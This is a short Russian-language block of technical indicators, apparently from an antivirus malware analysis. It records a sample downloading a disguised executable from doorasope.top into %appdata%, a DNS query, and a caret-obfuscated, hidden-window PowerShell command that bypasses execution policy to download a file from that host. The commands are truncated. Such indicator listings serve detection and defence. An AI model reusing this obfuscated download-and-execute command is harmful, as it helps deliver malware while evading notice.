Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWers^heLL.^EXe^ ^-e^xEcut^ioN^P^oLi^c^y^ ^BY^pA^S^s^ -nOPR^oFil^e -wIn^D^OW^sT^Y^le Hid^den (nEw-obJec^t^ sYsTeM.ne^T.we^BCLIENT^).^DOwn^L^oA^D^filE('http://www.doorasope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "p^oWers^heLL.^EXe^ ^-e^xEcut^ioN^P^oLi^c^y^ ^BY^pA^S^s^ -nOPR^oFil^e -wIn^D^OW^sT^Y^le Hid^den (nEw-obJec^t^ sYsTeM.ne^T.we^BCLIENT^).^DOwn^L^oA^D^filE('http://www.doorasope...' (со скрытым окном)